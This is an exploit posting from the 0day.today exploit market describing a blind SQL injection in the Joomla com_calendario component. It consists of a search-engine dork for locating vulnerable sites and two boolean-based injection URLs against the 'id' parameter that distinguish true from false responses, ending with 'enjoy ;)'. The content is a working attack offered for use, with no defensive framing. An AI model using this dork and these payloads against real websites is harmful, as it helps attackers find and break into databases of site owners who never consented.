[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_calendario Blind SQL injection Vulnerability

Author
Mr.tro0oqy
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10475
Category
web applications
Date add
28-12-2009
Platform
unsorted
=================================================================
Joomla Component com_calendario Blind SQL injection Vulnerability
=================================================================

dork: inurl:index.php?option=com_calendario
 
 
exp :
 
http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true
 
 
http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false
 
 
enjoy ;)



#  0day.today [2024-12-25]  #